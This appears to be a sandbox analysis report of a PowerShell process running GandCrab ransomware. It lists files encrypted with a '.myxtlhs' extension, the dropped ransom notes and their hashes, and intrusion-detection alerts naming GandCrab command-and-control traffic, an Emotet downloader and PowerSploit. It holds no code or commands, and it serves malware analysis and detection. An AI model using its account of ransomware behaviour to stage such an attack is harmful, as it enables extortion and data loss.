C:\Users\admin\AppData\Roaming\Microsoft\Publisher\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST.myxtlhs
binary
MD5: b849549bc599682574c0798620eddc6e
SHA256: 9425e9baaae3a0f8fb6d7999557e8443b3f1a3585c00fc7597e4dc6911c4b68b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b.myxtlhs
binary
MD5: 8d0031d25d49e9bda98c214bed77bef9
SHA256: 065e858ccc9d4938f9ea20bed47bd22b3dbd8c24d740fa7539f5a2bb9acfec77
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8.myxtlhs
binary
MD5: 64aa06e1c9becd57275e1f71d10c5272
SHA256: 323fdd6944004e84a3966e98177618198c5fdb212558f974ac995265a068a272
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred.myxtlhs
binary
MD5: d9da2bfc77380f7ca53be34145f2efcf
SHA256: 58eb693aa3d5335072b56bb7657a265bcdf0cd561c4e187f4f6111c25113c84b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs.myxtlhs
binary
MD5: d817d7f8e5921959ef945215742b85f6
SHA256: ce164bc6064db4917c6b9cade8769efde9b83885328343dc6077a39853a71343
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\PowerPoint\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Proof\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml.myxtlhs
binary
MD5: 54d600eca907d782f8e9d623db7ff5bc
SHA256: 50da007bc3fa7657b956b42d93c7b04763aeb37f16ffe2d70f7338ca576cfacc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml.myxtlhs
binary
MD5: 4e151fd471e62a635b61739491b660c0
SHA256: 8500ca02257a19f4a2f5ff442c1d1a5d56d7128ba7d1b163fa569d10c9ae5d61
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs.myxtlhs
binary
MD5: b614a89db1d0fb2392338f21cccd26e1
SHA256: 630a7b45389a08bee70334b14fe2d4d3acb54d4759bbfecdb6d6c2b41ff879ab
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml.myxtlhs
binary
MD5: fd7ad121dd5a7664fe444b5f5981e1df
SHA256: 3eb31310e9bfb5a42d9f6b82edeb81681627ba260be1c6969a05011390ddc6a7
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat.myxtlhs
binary
MD5: 7f8f98d895aed5a596cf01c0ef3c623e
SHA256: cf9041ba741e66ea869e073db0fe62564d09ddd9a170b44b018bf4c3e44b730c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl.myxtlhs
binary
MD5: 066ac89a300f5abac6f8387d44772e9b
SHA256: 20bb1829e67ceb070dc6b0b83163cf07558cb786c887dedd8f39780eda2c1d52
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
––
MD5:  ––
SHA256:  ––


Network activity

HTTP(S) requests
51
TCP/UDP connections
87
DNS requests
42
Threats
18

HTTP requests



Connections


DNS requests


Threats

PID Process Class Message
1684 powershell.exe A Network Trojan was detected SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1684 powershell.exe A Network Trojan was detected ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (gif)
1684 powershell.exe A Network Trojan was detected ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (jpg)
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (jpg)
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected ET POLICY Data POST to an image file (jpg)
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
1684 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity

Debug output strings

Process Message
notepad++.exe 42C4C5846BB675C74E2B2C90C69AB44366401093
notepad++.exe 42C4C5846BB675C74E2B2C90C69AB44366401093
notepad++.exe 42C4C5846BB675C74E2B2C90C69AB44366401093